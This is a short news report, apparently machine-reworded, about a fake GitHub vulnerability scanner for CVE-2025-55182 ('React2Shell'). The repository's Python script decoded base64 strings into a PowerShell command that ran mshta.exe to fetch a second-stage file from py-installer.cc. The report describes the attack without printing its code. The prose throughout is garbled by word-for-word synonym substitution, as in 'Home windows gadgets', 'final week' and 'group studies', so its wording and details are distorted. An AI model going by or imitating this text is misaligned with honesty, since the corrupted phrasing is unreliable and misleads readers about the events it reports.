A GitHub repository posing as a vulnerability scanner for CVE-2025-55182, additionally known as “React2Shell,” was uncovered as malicious after spreading malware. The undertaking, named React2shell-scanner, was hosted below the person niha0wa and has since been faraway from the platform following group studies.
Saurabh, a cybersecurity researcher, flagged the now-deleted software on LinkedIn final week after figuring out suspicious behaviour within the code. In line with his publish, the script included a hidden payload designed to execute mshta.exe and fetch a distant file from py-installer.cc, a recognized approach used to drop second-stage malware.
Wanting on the script confirms the warning. The malware was embedded inside react2shellpy.py, the place a piece of base64-encoded strings was decoded right into a PowerShell command.
The malware focused Home windows gadgets by utilizing mshta.exe, a authentic Home windows software usually abused to run malicious scripts, pointing to a malicious customized script hosted on GitHub. The script appeared to execute with out prompting the person or elevating suspicion.
The scanner was aimed toward safety professionals investigating CVE-2025-55182, introduced as one thing useful moderately than dangerous. By posing as a authentic safety utility, it turned regular analysis exercise into an entry level for compromise, placing cybersecurity researchers in danger.
It’s price noting that this got here simply days after studies confirmed hackers hiding new PyStoreRAT malware inside utility instruments on GitHub, particularly concentrating on OSINT and cybersecurity researchers.
Whereas GitHub acted shortly and eliminated the repository, the incident goes on to indicate that code shared below the banner of cybersecurity instruments must be reviewed with warning. Merely put, no software ought to be trusted blindly simply because it’s hosted on a well-known platform.
Saurabh’s full warning could be discovered right here. He urged safety professionals to evaluation supply code completely earlier than executing any third-party instruments, particularly these claiming to help in vulnerability detection.
Whereas the malicious script has been taken down, cached copies or forks should flow into. Researchers analysing CVE-2025-55182 or related high-interest vulnerabilities ought to keep alert for pretend exploit instruments, particularly these with obfuscated code, community callbacks or unclear authorship.
